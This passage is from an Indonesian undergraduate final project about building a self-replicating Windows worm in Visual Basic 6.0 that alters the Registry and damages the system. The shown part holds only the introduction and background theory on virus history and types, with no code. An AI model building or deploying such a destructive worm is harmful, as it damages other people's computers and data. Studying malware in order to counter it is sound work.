• Tidak ada hasil yang ditemukan

Aplikasi Virus Worm Pada Sistem Operasi Windows Menggunakan Visual Basic 6.0

N/A
N/A
Protected

Academic year: 2016

Membagikan "Aplikasi Virus Worm Pada Sistem Operasi Windows Menggunakan Visual Basic 6.0"

Copied!
74
0
0

Teks penuh

(1)

APLIKASI VIRUS WORM PADA SISTEM OPERASI WINDOWS

MENGGUNAKAN VISUAL BASIC 6.0

TUGAS AKHIR

SHOFIAH WARTIKA HUTASUHUT

072406115

PROGRAM STUDI D3 ILMU KOMPUTER

DEPARTEMEN MATEMATIKA

FAKULTAS MATEMATIKA DAN ILMU PENGETAHUAN ALAM

UNIVERSITAS SUMATERA UTARA

(2)

APLIKASI VIRUS WORM PADA SISTEM OPERASI WINDOWS

MENGGUNAKAN VISUAL BASIC 6.0

TUGAS AKHIR

Diajukan untuk melengkapi tugas dan memenuhi syarat mencapai Ahli Madya

SHOFIAH WARTIKA HUTASUHUT

072406115

PROGRAM STUDI D3 ILMU KOMPUTER

DEPARTEMEN MATEMATIKA

FAKULTAS MATEMATIKA DAN ILMU PENGETAHUAN ALAM

UNIVERSITAS SUMATERA UTARA

(3)

PERSETUJUAN

Judul : APLIKASI VIRUS WORM PADA SISTEM

OPERASI WINDOWS MENGGUNAKAN VISUAL BASIC 6.0

Kategori : TUGAS AKHIR

Nama : SHOFIAH WARTIKA HUTASUHUT Nomor Induk Mahasiswa : 072406115

Program Studi : D-3 ILMU KOMPUTER Departemen : MATEMATIKA

Fakultas : MATEMATIKA DAN ILMU PENGETAHUAN ALAM (FMIPA) UNIVERSITAS SUMATERA UTARA

(4)

PERNYATAAN

APLIKASI VIRUS WORM PADA SISTEM OPERASI WINDOWS MENGGUNAKAN VISUAL BASIC 6.0

TUGAS AKHIR

Saya mengakui bahwa tugas akhir ini adalah hasil kerja saya sendiri, kecuali beberapa kutipan dan ringkasan yang masing-masing disebutkan sumbernya.

Medan, Juni 2010

(5)

PENGHARGAAN

Puji dan syukur penulis panjatkan kepada Allah SWT atas limpahan rahmat dan hidayah-Nya sehingga tugas akhir ini dapat diselesaikan dengan baik dan dalam waktu yang telah ditetapkan.

Tugas akhir ini merupakan syarat untuk dapat menyelesaikan pendidikan di program studi D3 Ilmu Komputer Fakultas Matematika dan Ilmu Pengetahuan Alam di Universitas Sumatera Utara.

Pada kesempatan ini penulis juga menyampaikan terima kasih yang sebesar-besarnya kepada seluruh pihak yang sudah banyak membantu:

1. Bapak Dr. Eddy Marlianto, M.Sc, selaku Dekan Fakultas Matematika dan Ilmu Pengetahuan Alam di Universitas Sumatera Utara.

2. Bapak Dr. Saib Suwilo, M.Sc, selaku Ketua Departemen Matematika di Universitas Sumatera Utara.

3. Ibu Dra. Mardiningsih M.Si, selaku Ketua Program Studi D3 Ilmu Komputer di Universitas Sumatera Utara.

4. Bapak Drs. Bambang Irawan, M.Sc, selaku Dosen Pembimbing yang telah memberikan saran bimbingan sehingga penulis dapat menyelesaikan Tugas Akhir ini.

5. Ke dua orang tua tercinta yang telah memberikan seluruh rasa kasih dan sayang kepada semua anak-anaknya, terutama kepada penulis agar dapat menyelesaikan Tugas Akhir ini.

6. Adik-adik tercinta yang selalu mewarnai hidup penulis setiap harinya dengan celotehan-celotehan yang membuat penulis merasa dibutuhkan sebagai Kakak. 7. Terkhusus kepada Riadi Syafutra Siregar yang telah memberikan waktu,

tenaga serta perhatiannya. Terima kasih atas inspirasi dan motifasi yang penulis terima.

(6)

ABSTRAK

Pada penulisan Tugas Akhir ini, penulis membuat virus Worm. Virus merupakan suatu program komputer yang menduplikasikan atau menggandakan diri dengan menyisipkan salinan dirinya ke dalam media penyimpanan atau dokumen serta ke dalam jaringan secara diam-diam.

Metode dan perancangan virus ini menggunakan aplikasi perangkat lunak Visual Basic 6.0 sebagai bahasa pemrogramannya. Cara kerja virus Worm yang dibuat adalah melakukan fungsi-fungsi pada Form Load, penggandaan ke sistem, mengubah pengaturan Registry dan merusak sistem.

(7)

DAFTAR ISI

Daftar Gambar viii

Daftar Tabel ix

Bab 1 Pendahuluan

1.1Latar Belakang 1

1.2Identifikasi Masalah 2

1.3Pembatasan Masalah 3

1.4Perumusan Masalah 4

1.5Maksud dan Tujuan Penulisan 4

1.6Sistematika Penulisan 5

Bab 2 Landasan Teori

2.1 Komputer dan Sistem Komputer 6

2.1.1 Aspek Dasar Sistem Komputerisasi 7

2.2 Microsoft Visual Basic 6.0 9

2.3 Definisi Virus Komputer 11

2.3.1 Sejarah Virus Komputer 12

2.3.2 Klasifikasi Virus Komputer 14

2.3.3 Elemen Fungsional Virus Komputer 15

2.4 Cara Kerja Virus Komputer 16

2.4.1 Gambaran Fisik Virus Komputer 16

2.4.2 Cara Kerja Umum Berbagai Jenis Virus Komputer 17

2.5 Penyebaran Virus Komputer 19

2.5.1 Cara Penyebaran Virus Komputer 19

2.5.2 Faktor-Faktor Yang Mempengaruhi Penyebaran Virus Komputer 20

Bab 3 Perancangan Sistem

3.1 Gambaran Umum Virus Worm 22

3.2 Tahap Perancangan 22

3.2.1 Flowchart 23

3.2.2 Struktur Perancangan 24

3.2.3 Pembuatan Form Load 25

3.2.4 Pembuatan Kode Program Pada Form Load 28

3.2.5 Pembuatan Modul 28

(8)

Bab 4 Implementasi Sistem

4.1 Implementasi Sistem 30

4.2 Komponen Utama Dalam Implementasi Sistem 30

4.3 Tujuan Implementasi Sistem 31

4.4 Tahap Implementasi Sistem 32

4.4.1 Cara Kerja Virus Worm 32

4.4.2 Teknik Penyebaran 35

4.4.3 Rekayasa Teknik Penyebaran 36

4.4.4 Hasil Infeksi Virus Worm 36

4.4.5 Tampilan Infeksi Virus Worm 37

4.5 Cara Penanggulangan 39

Bab 5 Kesimpulan dan Saran

5.1 Kesimpulan 40

5.2 Saran 40

DAFTAR PUSTAKA

(9)

DAFTAR GAMBAR

Halaman Gambar 2.1 Tampilan Virus Creation Laboratory (VCL) 13

Gambar 2.2 Klasifikasi harmful program 15

Gambar 2.3 Gambaran fisik virus computer 16

Gambar 3.1 Flowchart Rancangan Virus Worm 23

Gambar 3.2 Struktur Diagram Virus Worm 24

Gambar 3.3 Tampilan Awal Visual Basic 6.0 25

Gambar 3.4 Tampilan Jendela Program 25

Gambar 3.5 Pengaturan BorderStyle 26

Gambar 3.6 Penambahan Objek ListBox 26

Gambar 3.7 Penambahan Objek TextBox 27

Gambar 3.8 Penambahan 4 (empat) Buah Objek Timer 27

Gambar 3.9 Pembuatan Kode Form Load 28

Gambar 3.10 Modul 1 29

Gambar 4.1 Tampilan Form Load Design 36

Gambar 4.2 Salah Satu Tampilan Worm Setelah Dijalankan 37

(10)

DAFTAR TABEL

Halaman

Tabel 3.1 Pilihan Tabulasi Kotak Dialog New Project 26

Tabel 3.2 Objek Properties 28

(11)

ABSTRAK

Pada penulisan Tugas Akhir ini, penulis membuat virus Worm. Virus merupakan suatu program komputer yang menduplikasikan atau menggandakan diri dengan menyisipkan salinan dirinya ke dalam media penyimpanan atau dokumen serta ke dalam jaringan secara diam-diam.

Metode dan perancangan virus ini menggunakan aplikasi perangkat lunak Visual Basic 6.0 sebagai bahasa pemrogramannya. Cara kerja virus Worm yang dibuat adalah melakukan fungsi-fungsi pada Form Load, penggandaan ke sistem, mengubah pengaturan Registry dan merusak sistem.

(12)

BAB 1

PENDAHULUAN

1.1 Latar Belakang

Pada saat ini, manfaat komputer sudah dirasakan oleh banyak orang. Komputer pada umumnya digunakan untuk membantu aktifitas manusia. Misalnya, membuat berbagai laporan, presentasi, membuat chart dan diagram, membuat berbagai animasi,

berkomunikasi, pertukaran data, dan sebagainya.

Saat ini, istilah virus komputer memang tidak asing lagi bagi kalangan pengguna komputer. Pada tahun 1988, muncul artikel-artikel di media massa yang dengan gencar memberitakan mengenai ancaman baru bagi para pemakai komputer

yang kemudian dikenal dengan sebutan “virus komputer”.

Virus dibuat oleh seseorang dengan tujuan yang bermacam-macam, pada awalnya pembuat virus membuat sebuah virus dengan tujuan untuk memberikan sistem keamanan terhadap komputer yang dimilikinya oleh orang-orang yang tidak

berhak menggunakan komputer tersebut. Tetapi, pada saat sekarang ini, para pembuat virus ingin mengejar popularitas dan kesenangan semata. Di sisi lain, apabila

(13)

Seiring dengan pesatnya perkembangan penggunaan komputer sebagai alat

bantu manusia di berbagai bidang kehidupan, virus komputer merupakan ancaman bagi keamanan sistem komputer yang sudah tidak asing lagi. Virus komputer sebagai

salah satu jenis infeksi elektronik, dapat menyebabkan kerusakan pada sistem komputer yang diserangnya. Namun sering kali kebanyakan orang masih awam mengenai penggolongan dari tipe-tipe infeksi elektronik seperti virus Worm dan

dampak yang ditimbulkan.

Berdasarkan pertimbangan tersebut penulis tertarik untuk membuat sebuah virus Worm dengan tujuan apabila mengetahui semua hal mengenai virus itu sendiri, maka akan lebih mudah untuk mengantisipasi dampak virus tersebut. Dengan memilih

judul: “APLIKASI VIRUS WORM PADA SISTEM OPERASI WINDOWS

MENGGUNAKAN VISUAL BASIC 6.0”.

1.2 Identifikasi Masalah

Jaringan komputer dewasa ini lebih mudah terhubung satu sama lain dibandingkan

sebelumnya. Peningkatan jumlah hubungan dalam sistem komunikasi memungkinkan Worm untuk dapat menyebar dengan sangat cepat dan bahkan menyerang target dengan jumlah yang sangat besar. Pada awalnya kecepatan penyebaran berbagai jenis

virus komputer cenderung lebih lambat, karena tergantung pada perilaku pengguna atau kecepatan pertukaran data yang dilakukan pengguna baik melalui email, file

(14)

Kemudahan pemrograman dalam sistem operasi Windows telah membuat

proses pembuatan virus komputer menjadi suatu hal yang cukup mudah. Sebelumnya, tidak ada orang yang pernah memperkirakan bahwa aplikasi seperti Microsoft Word

dan Excel dapat menjadi salah satu media penyebaran yang sangat sukses bagi virus komputer seperti Worm.

Menyadari besarnya resiko dan banyaknya tingkat kesulitan yang akan dihadapi dalam pembuatan virus Worm ini, untuk menghindari kerancuan dalam

pembahasan masalah dan mengingat keterbatasan pengetahuan penulis, maka penulis hanya akan membahas tentang bagaimana membuat sebuah virus Worm, mengetahui cara kerja dari virus Worm dan cara mengatasinya berdasarkan pengetahuan yang

diperoleh dan diharapkan dapat dipergunakan oleh masyarakat luas khususnya bagi Mahasiswa ataupun orang-orang yang bergelut di bidang komputer sebagai bahan

pembelajaran mengenai virus sehingga lebih mudah dalam mencari solusi untuk mengantisipasinya.

1.3 Pembatasan Masalah

Untuk menghindari terjadinya penyimpangan dalam pembahasan, penulis membatasi permasalahan yang akan dibahas, antara lain:

a. Virus Worm ini hanya dipergunakan sebagai bahan pembelajaran dan penelitian mengenai dampaknya pada sistem operasi Windows dan cara mengatasinya.

b. Adapun yang akan disampaikan dalam pembuatan virus Worm ini, yaitu: 1. Definisi dan sejarah virus komputer.

(15)

3. Cara pembuatan dan cara kerja dari virus Worm.

4. Cara penyebaran, faktor-faktor yang mempengaruhi penyebarannya dan cara penanggulangannya.

1.4 Perumusan Masalah

Berdasarkan judul yang diambil dan latar belakang yang telah diuraikan sebelumnya,

permasalahan yang muncul dalam perancangan dan pembuatan virus Worm ini adalah “Bagaimana dapat mengetahui cara kerja virus Worm dengan menggunakan Visual Basic 6.0”.

1.5 Maksud dan Tujuan Penulisan

Adapun maksud dari perancangan dan pembuatan virus Worm ini adalah untuk

mengetahui lebih jauh lagi tentang cara kerja dan penyebaran virus Worm pada sistem operasi Windows.

Adapun tujuan dari perancangan dan pembuatan virus Worm ini antara lain: a. Untuk memenuhi salah satu syarat menyelesaikan perkuliahan di Program Studi D3

Ilmu Komputer FMIPA USU.

b. Untuk mempelajari dan meneliti lebih jauh mengenai cara kerja, dampak yang ditimbulkan oleh virus Worm dan cara penanggulangannya pada sistem operasi

Windows.

(16)

1.6 Sistematika Penulisan

Dalam penulisan ini, penulis membentuk suatu sistematika penulisan yang bertujuan untuk menggambarkan secara ringkas seluruh isi bab yang mencakup hal-hal sebagai

berikut:

BAB 1 : PENDAHULUAN

Bab ini menguraikan Latar Belakang, Identifikasi Masalah, Pembatasan Masalah, Perumusan Masalah, Maksud dan Tujuan Penulisan dan Sistematika Penulisan.

BAB2 : LANDASAN TEORI

Bab ini menguraikan tentang Komputer dan Sistem Komputer,

Microsoft Visual Basic 6.0, Definisi Virus Komputer, Cara Kerja Virus Komputer, Penyebaran Virus Komputer.

BAB 3 : PERANCANGAN SISTEM

Bab ini menguraikan tentang Gambaran Umum Virus Worm, Tahap Perancangan.

BAB 4 : IMPLEMENTASI SISTEM

Bab ini menguraikan tentang Tahap Implementasi Sistem, Komponen Utama Dalam Implementasi Sistem, Tujuan Implementasi Sistem,

Tahap Implementasi Sistem dan Cara Penanggulangan.

BAB 5 : KESIMPULAN DAN SARAN

(17)

BAB 2

LANDASAN TEORI

2.1 Komputer dan Sistem Komputer

Saat ini, komputer telah menjadi alat yang memiliki fungsi yang luas dan kemampuan yang hebat. Banyak pekerjaan yang dapat dilakukan dengan bantuan komputer. Mulai

dari pengolahan data, penyimpanan data, pembuatan grafik atau tabel, pemecahan perhitungan-perhitungan yang rumit serta pengontrolan peralatan-peralatan elektronik dan mekanik lainnya.

Komputer merupakan alat pengolahan data yang terdiri dari serangkaian

komponen (Hardware) yang bekerja secara elektronik di bawah pengendalian

Operating System (Software), melaksanakan instruksi-instruksi (By Program),

mempunyai kapasitas memory (RAM dan ROM) dan tempat penyimpanan (Internal

Storage) serta dapat dihubungkan dengan peralatan-peralatan lain yang bekerja secara

elektronik dengan kecepatan dan ketelitian yang tinggi dan mampu mengerjakan

berbagai macam proses dengan keterlibatan manusia yang minimum pada saat komputer tersebut menjalankan proses pengolahan data. Komputer disebut juga sebagai suatu sistem karena terdiri dari unsur-unsur yang tidak dapat dipisahkan satu

(18)

Sistem komputer adalah sekumpulan komponen yang bekerja sama secara

sistematis dan terpadu dalam pengolahan data dengan kecepatan dan ketelitian yang sangat tinggi dengan maksud dan tujuan tertentu (Darwin Sitompul, 1994).

Sistem komputerisasi adalah segala macam pengolahan terhadap data dengan segala kemampuan yang ada pada komputer seperti kecepatan dan ketelitian yang

sangat tinggi juga kemampuan menyimpan data, sehingga mesin tersebut dapat melakukan segala macam proses secara berkelanjutan tanpa banyak menguras tenaga

manusia (Darwin Sitompul, 1994).

2.1.1 Aspek Dasar Sistem Komputerisasi

Aspek dasar sistem komputerisasi terdiri dari fasilitas-fasilitas yang harus ada apabila suatu usaha telah memasuki langkah menggunakan peralatan komputer sebagai alat bantu dalam pengolahan data atau pengolahan informasi. Adapun aspek dasar sistem

komputerisasi tersebut adalah sebagai berikut: 1. Aspek Teknis

a. Hardware (Perangkat Keras)

Hardware (Perangkat Keras) adalah komponen-komponen yang membentuk

suatu sistem komputer yang berhubungan dengan komponen lainnya, sehingga

memungkinkan komputer melakukan tugasnya. Perangkat keras tersebut terdiri dari perangkat masukan (input device), perangkat pengolahan (processor) dan

(19)

b. Software (Perangkat Lunak)

Software (Perangkat Lunak) adalah seluruh fasilitas dari suatu sistem

pengolahan data yang bukan merupakan peralatan komputernya tetapi

merupakan suatu susunan instruksi yang harus diberikan kepada unit pengolahan agar komputer dapat menjalankan tugasnya (Tri Amperiyanto, 2008).

c. Brainware (Perangkat Manusia)

Brainware (Perangkat Manusia) adalah faktor manusia yang memiliki latar

belakang pendidikan teknis komputer yang dapat menangani pengolahan komputer maupun pengembangannya yang dibedakan menurut kemampuan dan keahlian (Tri Amperiyanto, 2008).

Ke tiga komponen tersebut harus saling berhubungan dan membentuk suatu

kesatuan yang saling mendukung satu sama lain. Hardware tanpa adanya Software hanya berupa benda mati saja karena Software yang akan mengoperasikan Hardware dan tidak dapat berfungsi tanpa adanya peran manusia (Brainware) sebagai user yang

mengoperasikannya.

2. Aspek Non-Teknis

Dukungan manajemen merupakan aspek non-teknis karena pada umumnya suatu sistem komput erisasi yang dilaksanakan dalam suatu organisasi atau badan usaha berguna untuk pengolahan informasi bagi kepentingan manajemen dalam rangka

(20)

2.2 Microsoft Visual Basic 6.0

Microsoft Visual Basic adalah bahasa pemrograman yang memungkinkan pemakainya untuk membuat suatu aplikasi dalam Microsoft Windows dengan menggunakan

metode GUI (Graphical User Interface). Visual Basic dibuat sebagai langkah pengembangan untuk menyesuaikan Basic (Beginners All-purpose Symbolic

Instruction Code) yang berbasis DOS yang tidak mempunyai kemampuan

menggunakan metode GUI dalam basis Windows.

Visual Basic merupakan program yang berbasis Windows yang mempunyai kemampuan utnuk berinteraksi dengan seluruh aplikasi Windows seperti Microsoft

Word, Microsoft Excel, Microsoft Access. Visual Basic juga menjadi salah satu bahasa pemrograman yang wajib dipelajari oleh berbagai kalangan di dunia komputer.

Visual Basic 6.0 mempunyai kemampuan yang lebih baik dari versi-versi sebelumnya. Mulai dari desktop, client-server, sampai Database yang mampu menjangkau antarnegara lewat internet dapat disusun secara mudah dan

menyenangkan dengan menggunakan bahasa pemrograman Visual Basic. Berikut adalah beberapa komponen dalam lingkungan Visual Basic 6.0.

1. Menu Bar

Menu bar berfungsi untuk memilih tugas-tugas tertentu seperti memulai,

(21)

2. Main Toolbar

Toolbar memiliki fungsi yang sama seperti menu bar dan juga berfungsi seperti jalan pintas karena lebih praktis dalam penggunaannya.

3. Jendela ToolBox (ToolBox Standard)

ToolBox Standard berisi komponen-komponen yang merupakan sarana untuk

membentuk user interface. Lihat pada Gambar 2.2.

4. Jendela Form Designer

Jendela ini merupakan tempat untuk merancang user interface (tampilan program).

Di sinilah para programmer bisa meletakkan kontrol-kontrol yang dibutuhkan. 5. Jendela Project

Jendela Project adalah jendela yang menampilkan semua file yang berhubungan

dengan aplikasi atau project yang saat itu sedang dijalankan. 6. Jendela Properties

Jendela ini berisi daftar properti untuk objek (form atau kontrol) yang dipilih dan berfungsi untuk mengatur karakteristik seperti warna, ukuran dan lain-lain.

7. Jendela Form Layout

Jendela ini akan menunjukkan tampilan form pada saat dijalankan. 8. Jendela Kode

Jendela ini merupakan tempat untuk menuliskan kode-kode bagi objek yang dibuat dan mengatur karakteristik dari form yang akan dibuat.

9. Jendela Modul

Jendela modul merupakan tempat untuk menuliskan kode-kode yang lebih bersifat global dan tempat untuk mendeklarasikan variabel dan fungsi dengan awalan

(22)

2.3 Definisi Virus Komputer

Virus komputer merupakan suatu program komputer yang menduplikasikan atau menggandakan diri dengan menyisipkan salinan dirinya ke dalam media penyimpanan

atau dokumen serta ke dalam jaringan secara diam-diam tanpa sepengetahuan pengguna komputer tersebut. Efek dari virus komputer sangat beragam mulai dari

hanya muncul pesan-pesan aneh hingga merusak komputer serta menghapus file atau dokumen. Untuk lebih jelas, berikut akan dibahas mengenai definisi virus komputer, sejarah virus komputer, klasifikasi virus komputer, elemen fungsional virus komputer,

cara kerja virus komputer dan cara penyebaran virus computer (Team Cyber, 2009).

Istilah virus komputer pertama kali digunakan oleh Fred Cohen dalam

papernya yang berjudul “Computer Viruses–Theory and Experiments” pada tahun 1984. Menurutnya virus komputer itu sendiri bersesuaian dengan sifat dasarnya, yaitu: mempunyai kemampuan untuk menjangkiti (menginfeksi) program lain dan

menyebar. Pada dasarnya, penggunaan istilah virus dikarenakan adanya kesamaan dalam hal sifat antara virus komputer dengan virus yang dikenal dalam dunia fisik. Di

mana ke duanya memiliki 2 (dua) tujuan yaitu: untuk bertahan hidup dan bereproduksi.

Pada dasarnya virus komputer dapat diklasifikasikan menjadi 2 (dua) tipe. Tipe virus komputer yang pertama adalah dibuat untuk tujuan penelitian atau studi dan

(23)

2.3.1 Sejarah Virus Komputer

Selain membahas definisi dari virus komputer, penulis juga akan membahas mengenai sejarah virus komputer itu sendiri. Berikut adalah sekilas mengenai sejarah virus

komputer yang berkembang dari tahun ke tahun:

1. Perkembangan virus komputer pada tahun 1980-1989

Pada tahun 1981 Virus “in the wild” adalah yang pertama kali ditemukan. Virus yang bernama “Elk Cloner” ini menyebar melalui floppy disk pada komputer Apple II. Tahun 1986, Basit dan Amjad, menciptakan sebuah boot sector virus bernama Brain.

Brain sering kali disebut sebagai virus komputer pertama di dunia.

Selanjutnya pada tahun 1987 Virus file infector seperti Leigh mulai bermunculan dan virus penyerang file-file EXE pertama, Suriv 01 dan 02 serta Jerusalem. Tahun 1988 adalah tahun didirikannya CERT (Computer Emergency

Response Team) oleh DARPA dengan tujuan mengatasi serangan Worm yang

diciptakan oleh Robert Morris dan pada tahun 1989, AIDS Trojan muncul dengan

menggunakan samaran sebagai AIDS information program. Ketika dijalankan ia akan mengenkripsi hard drive dan meminta pembayaran untuk kunci dekripsinya.

2. Perkembangan virus komputer pada tahun 1990-2000

Pada tahun 1992, muncullah beberapa tool yang dapat digunakan untuk menciptakan virus seperti Dark Avenger Mutation Engine (DAME) yang dapat mengubah virus apa

(24)

Gambar 2.1 Tampilan Virus Creation Laboratory (VCL)

Selanjutnya pada tahun 1995, para hacker dengan nama “Internet Liberation

Front” melakukan banyak serangan pada hari Thanksgiving. Beberapa badan yang

menjadi korban serangan ini adalah Griffith Air Force Base, Korean Atomic Research Institute, NASA, GE, IBM dan lain-lain. Virus macro pertama yang menyerang

aplikasi Microsoft Word pun dikembangkan.

Kemudian pada tahun 1996, virus Laroux, virus penyerang Microsoft Excel pertama dan virus Staog, virus Linux pertama muncul. Tahun 1999 muncul virus Melissa yang merupakan kombinasi antara virus macro yang menyerang aplikasi

Microsoft Word. Kemudian pada tahun 2000, serangan Distributed Denial of Service (DDoS) pertama membuat kerusakan pada situs-situs besar seperti Yahoo!,

Amazon.com, dan lain-lain. Virus Love Letter merupakan Worm dengan kecepatan menyebar tertinggi pada saat itu yang menyebabkan kerusakan pada banyak sistem

email di seluruh dunia.

Pada tahun 2001, Gnuman (Mandragore) merupakan Worm pertama yang

menyerang jaringan komunikasi peer to peer. Worm ini menyamarkan diri dalam bentuk file MP3 yang dapat didownload. Tahun 2002, Donut merupakan Worm pertama yang menyerang .NET services. SQL Spider merupakan Worm yang

(25)

2.3.2 Klasifikasi Virus Komputer

Virus komputer dan program lain yang membahayakan sistem komputer dapat diklasifikasikan ke dalam beberapa kelompok menurut cara mereka untuk menjangkiti

(infect) sebuah sistem komputer, bagian dari sistem komputer yang mereka jangkiti

atau kelakuan (behaviour) yang dimiliki oleh mereka. Namun pada dasarnya definisi

dan klasifikasi mengenai kode-kode program berbahaya ini masih rancu dan menjadi kontroversi bagi banyak orang bahkan bagi orang yang memang mendalami bidang komputer.

Berikut adalah contoh klasifikasi dari berbagai jenis harmful program:

1. Malware (Malicious Software): merujuk pada program yang dibuat dengan tujuan membahayakan atau menyerang sebuah sistem komputer. Terdiri atas virus komputer (computer viruses), Worms, Trojan Horses dan lain-lain.

a. Computer Virus: merujuk pada program yang memiliki kemampuan untuk bereplikasi dengan sendirinya.

b. Computer Worm: merujuk pada program Independen yang memiliki

kemampuan untuk bereplikasi dengan sendirinya, di mana Worm tidak memiliki host program untuk ditumpangi.

(26)

2. Malicious toolkits: merujuk pada program yang didesain untuk membantu

menciptakan program yang dapat membahyakan sistem komputer. Contohnya adalah tool pembuat virus dan program yang dibuat untuk membantu proses

hacking.

3. Joke program: merujuk pada program yang meniru operasi-operasi yang dapat membahayakan sistem komputer, namun sebenarnya dibuat untuk tujuan lelucon

dan tidak mengandung operasi berbahaya apapun.

Gambar 2.2 Klasifikasi harmful program

2.3.3 Elemen Fungsional Virus Komputer

Setiap virus komputer yang aktif, pada dasarnya harus terdiri atas 2 (dua) buah bagian dasar atau subroutine, yaitu:

1. Search routine: berfungsi menemukan file atau lokasi baru yang akan dijadikan target berikutnya untuk diserang dan juga menentukan cara virus bereproduksi secara cepat atau lambat serta menyerang sebagian atau seluruh bagian dari target.

Namun sebagaimana ukuran dan fungsionalitas yang dimiliki setiap program, virus memiliki search routine yang rumit, sehingga akan dibutuhkan ruang yang

(27)

2. Copy routine: bagian ini berfungsi untuk menyalin dirinya sendiri pada area yang

telah ditentuka n oleh search routine. Ukuran dari bagian ini bergantung pada kompleksitas dari virus tersebut.

2.4 Cara Kerja Virus Komputer

Dalam melakukan proses replikasi sebuah virus memodifikasi program lain sehingga virus tersebut menjadi bagian dari program tersebut. Sehingga setiap kali program

tersebut dieksekusi, virus akan dieksekusi pula dan menyerang program lain.

2.4.1 Gambaran Fisik Virus Komputer

Untuk mengetahui lebih jelas mengenai gambaran fisik dari suatu virus komputer,

berikut ini disajikan gambar fisik dari suatu virus komputer.

Gambar 2.3 Gambaran fisik virus komputer

Tampak pada gambar di atas 3 (tiga) jenis virus komputer yaitu:

1. Overwriting viruses: virus ini menjadi bagian dari program host dengan “menimpa” (menggantikan) bagian awal dari program tersebut, sehingga program

host tidak akan mengalami perubahan ukuran, namun mengalami kerusakan dan

(28)

2. Prepending viruses: virus bereplikasi dengan menjadi bagian awal dari program

host sehingga ketika program host dieksekusi, sebelumnya program host virus

akan terlebih dahulu dieksekusi. Keberadaan virus tidak menyebabkan kerusakan

fungsional pada program namun akan memperbesar ukuran program.

3. Appending viruses: virus bereplikasi dengan menjadi bagian akhir dari program

host tanpa mengubah isi dari program host. Namun pada bagian awal program

yang telah terinfeksi diberikan mekanisme agar ketika program dieksekusi, virus akan dieksekusi terlebih dahulu.

2.4.2 Cara Kerja Umum Berbagai Jenis Virus Komputer

Berikut ini adalah penjelasan mengenai cara kerja umum berbagai jenis virus computer (Leo Hendrawan, 2004).

1. File infector virus: memiliki kemampuan untuk melekatkan diri (attach) pada sebuah file, biasanya merupakan file executable. Pada umumnya virus jenis ini tidak menyerang file data. Namun dewasa ini, sebuah file data atau dokumen

lainnya dapat mengandung kode executable yang dapat dieksploitasi oleh pencipta virus komputer seperti Worms atau Trojan Horse.

2. Boot sector virus: memodifikasi program yang berada di dalam boot sector. Pada umumnya, sebuah boot sector virus akan terlebih dahulu mengeksekusi dirinya sendiri sebelum proses bootup pada PC, sehingga seluruh floppy disk yang

digunakan pada PC tersebut akan terjangkiti pula.

3. Multipartite virus: memiliki fitur dari kedua jenis virus di atas. Ketika sebuah file

(29)

4. Virus Macro: menjangkiti program macro dari sebuah file data atau dokumen,

sehingga dokumen berikutnya yang diedit oleh program aplikasi tersebut akan terinfeksi pula oleh macro yang telah terinfeksi sebelumnya.

5. Virus Stealth: virus ini bekerja secara residensial (menetap) di dalam memori dan menyembunyikan perubahan yang telah dilakukannya terhadap file yang dijangkiti. Hal ini dilakukan dengan mengambil alih fungsi sistem ketika terjadi

proses pembacaan. Jika program lain meminta informasi, maka virus akan memberikan informasi yang sesuai dengan keadaan sebelum terjangkiti virus,

sehingga seolah-olah sistem berfungsi dalam keadaan baik.

6. Virus Polymorphic: virus yang melakukan perubahan di dalam kodenya setiap kali mengalami proses replikasi sehingga sulit untuk dideteksi oleh antivirus software.

7. Virus Tunneling: virus ini mengambil alih interrupt handlers pada DOS dan BIOS, kemudian menginstall dirinya di bawah program lainnya, sehingga virus

dapat menghindari hadangan dari program antivirus sejenis Monitors.

8. Fast Infectors Virus: Virus jenis ini tidak hanya menyerang ketika program target dieksekusi, melainkan juga ketika diakses. Hal ini bertujuan untuk menumpangi

perangkat antivirus sebagai media penyebaran ketika melakukan pengecekan terhadap file-file di dalam komput er.

9. Slow Infectors Virus: merupakan kebalikan dari fast infectors, di mana virus hanya akan menyebar ketika file-file target diciptakan atau dimodifikasi. Hal ini bertujuan untuk memperdaya antivirus sejenis integrity checkers dengan

menumpangi proses untuk mengubah sebuah file.

10. Armoured virus: merupakan virus yang dibuat sedemikian rupa sehingga sulit

(30)

2.5 Penyebaran Virus Komputer

Virus dapat menyebar dan menjangkiti komputer dengan berbagai cara penyebaran. Berikut akan dibahas mengenai berbagai cara penyebaran dari virus komputer dan faktor-faktor yang mempengaruhi penyebaran virus komputer.

2.5.1 Cara Penyebaran Virus Komputer

Berikut adalah cara penyebaran virus komputer yang umum pada saat ini. 1. Boot Sector Virus

Sebuah PC terinfeksi oleh boot sector virus jika PC tersebut di boot atau di re-boot dari floppy disk yang telah terinfeksi oleh virus. Boot sector virus cenderung tidak

menyebar melalui jaringan komputer dan biasanya menyebar akibat ketidaksengajaan penggunaan floppy disk yang telah terinfeksi.

2. File virus

Virus ini menginfeksi file lain ketika program yang telah terinfeksi olehnya dieksekusi. Oleh sebab itu virus jenis ini dapat menyebar melalui jaringan komputer dengan sangat cepat.

3. Multiparte virus

Virus jenis ini menginfeksi baik boot sector maupun file jenis lain.

4. Macro virus

Macro berisi perintah program otomatis. Saat ini, banyak aplikasi umum yang menggunakan macro. Jika seorang pengguna mengakses sebuah dokumen yang

mengandung macro yang telah terinfeksi virus dan secara tidak sengaja mengeksekusinya, maka virus ini dapat menyalin dirinya ke dalam file startup dari

(31)

ini. Aplikasi seperti Microsoft Word dan Microsoft Excel tergolong sangat rentan

terhadap virus jenis ini. 5. Email Worm

Sebagian besar penyebab penyebaran virus saat ini adalah attacment email yang telah terinfeksi. Kemudahan pengguna untuk mendownload attachment email tersebut dan mengeksekusinya. Hal ini dikarenakan sering kali isi email yang

bersangkutan bersifat mengundang. Selain melalui email, Worm juga dapat menyebar melalui newsgroup posting.

2.5.2 Faktor-Faktor Yang Mempengaruhi Penyebaran Virus Komputer

Pada saat ini, terdapat enam faktor teknologi berpengaruh pada keragaman dan tingkat

kompleksitas dari virus komputer.

1. Penggunaan Teknologi Komunikasi Broadband

Penggunaan teknologi komunikasi broadband di rumah-rumah, seperti cable

modem dan Digital Subscriber Line (DSL). Pada masa yang akan datang akan

menjadikan hubungan yang bersifat konstan dan statis antara pengguna dan

jaringan internet. Hal ini dapat memudahkan para hacker atau Worm untuk menentukan target dan menyerang komputer para pengguna yang terhubung

dengan jaringan internet.

2. Proses disassembly yang semakin sulit

Mayoritas virus komputer di masa lampau ditulis dengan menggunakan bahasa

asembly yang merupakan bahasa pemrograman tingkat rendah dan cukup sulit

untuk digunakan. Namun pada saat ini, mayoritas berbagai jenis virus komputer

(32)

